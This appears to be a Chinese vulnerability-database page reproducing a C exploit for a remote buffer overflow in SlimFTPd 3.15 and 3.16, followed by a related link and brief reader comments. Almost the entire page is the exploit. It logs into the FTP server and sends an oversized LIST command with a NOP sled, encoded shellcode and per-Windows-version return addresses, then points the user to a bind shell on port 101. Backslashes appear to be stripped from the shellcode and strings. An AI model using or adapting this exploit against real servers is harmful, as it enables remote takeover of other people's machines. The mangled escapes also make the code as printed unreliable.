SlimFTPd 3.16 – Remote Buffer Overflow
| 漏洞ID | 1055286 | 漏洞类型 | |
| 发布时间 | 2005-07-25 | 更新时间 | 2005-07-25 |
![图片[1]-SlimFTPd 3.16 – Remote Buffer Overflow-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-SlimFTPd 3.16 – Remote Buffer Overflow-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
*
* Written by redsand
* <[email protected]>
*
* Jul 22, 2005
* Vulnerable: SlimFtpd v3.15 and v3.16
* origional vuln found by:
*
* Usage: ./redslim 127.0.0.1 [# OS RET ]
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN
#include <winsock2.h>
#include <windows.h>
// #pragma lib <ws2_32.lib> // win32-lcc specific
#pragma comment(lib, "ws2_32.lib") // ms vc++
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif
#define USERNAME "anonymous"
#define PASSWORD "[email protected]"
// buf size = 512 + max
#define NOP 0x90
#define BUFSIZE 2048
#define PORT 21
#define LSZ 525
unsigned char *login [] = { "USER "USERNAME"rn", "PASS "PASSWORD"rn", "LIST ", "XMKD AAAAAAAArn", "CWD AAAAAAAArn", NULL };
unsigned char *targets [] =
{
"Windows XP SP0/SP1 ",
"Windows XP SP2 ",
"Windows 2000 SP1/SP4 ",
"Windows 2003 Server SP1",
"Denial-of-Service",
NULL
};
unsigned long offsets [] =
{
// jmp esi
0x71a5b80b, // Windows XP 5.1.1.0 SP1 (IA32) Windows XP 5.1.0.0 SP0 (IA32)
0x77f1a322, // Windows XP 5.1.2.0 SP2 (IA32)
0x74ffbb65, // Windows 2000 5.0.1.0 SP1 (IA32) Windows 2000 5.0.4.0 SP4 (IA32)
0x77f7fe67, // Windows 2003 Server 5.2.1.0 SP1 (IA32)
0x44434241,
0
};
unsigned char shellcode[] = "xEB"
"x0Fx58x80x30x88x40x81x38x68x61x63x6Bx75xF4xEBx05xE8xECxFFxFF"
"xFFx60xDEx88x88x88xDBxDDxDExDFx03xE4xACx90x03xCDxB4x03xDCx8D"
"xF0x89x62x03xC2x90x03xD2xA8x89x63x6BxBAxC1x03xBCx03x89x66xB9"
"x77x74xB9x48x24xB0x68xFCx8Fx49x47x85x89x4Fx63x7AxB3xF4xACx9C"
"xFDx69x03xD2xACx89x63xEEx03x84xC3x03xD2x94x89x63x03x8Cx03x89"
"x60x63x8AxB9x48xD7xD6xD5xD3x4Ax80x88xD6xE2xB8xD1xECx03x91x03"
"xD3x84x03xD3x94x03x93x03xD3x80xDBxE0x06xC6x86x64x77x5Ex01x4F"
"x09x64x88x89x88x88xDFxDExDBx01x6Dx60xAFx88x88x88x18x89x88x88"
"x3Ex91x90x6Fx2Cx91xF8x61x6DxC1x0ExC1x2Cx92xF8x4Fx2Cx25xA6x61"
"x51x81x7Dx25x43x65x74xB3xDFxDBxBAxD7xBBxBAx88xD3x05xC3xA8xD9"
"x77x5Fx01x57x01x4Bx05xFDx9CxE2x8FxD1xD9xDBx77xBCx07x77xDDx8C"
"xD1x01x8Cx06x6Ax7AxA3xAFxDCx77xBFx77xDDxB8xB9x48xD8xD8xD8xD8"
"xC8xD8xC8xD8x77xDDxA4x01x4FxB9x53xDBxDBxE0x8Ax88x88xEDx01x68"
"xE2x98xD8xDFx77xDDxACxDBxDFx77xDDxA0xDBxDCxDFx77xDDxA8x01x4F"
"xE0xCBxC5xCCx88x01x6Bx0Fx72xB9x48x05xF4xACx24xE2x9DxD1x7Bx23"
"x0Fx72x09x64xDCx88x88x88x4ExCCxACx98xCCxEEx4FxCCxACxB4x89x89"
"x01xF4xACxC0x01xF4xACxC4x01xF4xACxD8x05xCCxACx98xDCxD8xD9xD9"
"xD9xC9xD9xC1xD9xD9xDBxD9x77xFDx88xE0xFAx76x3Bx9Ex77xDDx8Cx77"
"x58x01x6Ex77xFDx88xE0x25x51x8Dx46x77xDDx8Cx01x4BxE0x77x77x77"
"x77x77xBEx77x5Bx77xFDx88xE0xF6x50x6AxFBx77xDDx8CxB9x53xDBx77"
"x58x68x61x63x6Bx90";
long gimmeip(char *);
void keepout();
void shell(int);
void keepout() {
#ifdef WIN
WSACleanup();
#endif
exit(1);
}
void banner() {
printf("- SlimFtpd v3.15 and v3.16 remote buffer overflown");
printf("- Written by redsand (redsand [at] redsand.net)n");
}
void usage(char *prog) {
int i;
banner();
printf("- Usage: %s <target ip> <OS> [target port]n", prog);
printf("- Targets:n");
for (i=0; targets[i] != NULL; i++)
printf("t- %dt%sn", i, targets[i]);
printf("n");
exit(1);
}
/***************************************************************/
long gimmeip(char *hostname) {
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) {
printf("[x] Failed to resolve host: %s! Exiting...nn",hostname);
keepout();
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
int main(int argc, char *argv[]) {
int sock;
char expbuff[BUFSIZE];
char recvbuff[BUFSIZE];
void *p;
unsigned short tport = PORT; // default port for ftp
struct sockaddr_in target;
unsigned long retaddr;
int len,i=0;
unsigned int tar;
#ifdef WIN
WSADATA wsadata;
WSAStartup(MAKEWORD(2,0), &wsadata);
#endif
if(argc < 3) usage(argv[0]);
if(argc == 4)
tport = atoi(argv[3]);
banner();
tar = atoi(argv[2]);
retaddr = offsets[tar];
printf("- Using return address of 0x%8x : %sn",retaddr,targets[tar]);
printf("n[+] Initialize socket.");
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("[x] Error socket. Exiting...n");
keepout();
}
memset(&target,0x00,sizeof(target));
target.sin_family = AF_INET;
target.sin_addr.s_addr = gimmeip(argv[1]);
target.sin_port = htons(tport);
printf("n[+] Prepare exploit buffer... ");
memset(expbuff, 0x00, BUFSIZE);
memset(recvbuff, 0x00, BUFSIZE);
memcpy(expbuff, login[2], strlen(login[2]));
p = &expbuff[strlen(login[2]) ];
memset(p, NOP, LSZ);
memcpy(&expbuff[10],shellcode,sizeof(shellcode)-1);
*(unsigned long *)&expbuff[507] = retaddr;
p = &expbuff[511];
memcpy(p, "n",1);
printf("n[+] Connecting at %s:%hu...", argv[1], tport);
fflush(stdout);
if (connect(sock,(struct sockaddr*)&target,sizeof(target))!=0) {
fprintf(stderr,"n[x] Couldn't establish connection. Exiting...n");
keepout();
}
printf(" - OK.n");
len = recv(sock, recvbuff, BUFSIZE-1, 0);
if(len < 0) {
fprintf(stderr,"nError response servern");
exit(1);
}
printf(" - Size of payload is %d bytes",strlen(expbuff));
printf("n[+] Initiating exploit... ");
printf("n - Sending USER...");
if(send(sock,login[0],strlen(login[0]),0)==-1) {
fprintf(stderr,"n[-] Exploit failed.n");
keepout();
}
len = recv(sock, recvbuff, BUFSIZE-1,0);
if(len < 0) {
fprintf(stderr,"nError recv.");
exit(1);
}
recvbuff[len] = 0;
printf("n - Sending PASS...");
if(send(sock,login[1],strlen(login[1]),0)==-1) {
printf("n[-] Exploit failed.n");
keepout();
}
len = recv(sock, recvbuff, BUFSIZE, 0);
if(len < 0) {
fprintf(stderr,"nError recv.");
exit(1);
}
recvbuff[len] = 0;
printf("n - Creating X-DIR...");
if(send(sock,login[3],strlen(login[3]),0)==-1) {
printf("n[-] Exploit failed.n");
keepout();
}
len = recv(sock, recvbuff, BUFSIZE, 0);
if(len < 0) {
fprintf(stderr,"nError recv.");
exit(1);
}
recvbuff[len] = 0;
if(send(sock,login[4],strlen(login[4]),0)==-1) {
printf("n[-] Exploit failed.n");
keepout();
}
len = recv(sock, recvbuff, BUFSIZE, 0);
if(len < 0) {
fprintf(stderr,"nError recv.");
exit(1);
}
recvbuff[len] = 0;
printf("n - Sending Exploit String...");
if(send(sock,expbuff,strlen(expbuff),0)==-1) {
printf("n[-] Exploit failed.n");
keepout();
}
printf("- OK.");
printf("n[+] Now try to connect to the shell on %s:101n", argv[1] );
#ifdef WIN
closesocket(sock);
WSACleanup();
#else
close(sock);
#endif
return(0);
}
// milw0rm.com [2005-07-25]相关推荐: Jelsoft vBulletin PHP Command Execution Vulnerability
Jelsoft vBulletin PHP Command Execution Vulnerability 漏洞ID 1103371 漏洞类型 Input Validation Error 发布时间 2001-03-15 更新时间 2001-03-15 CVE…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666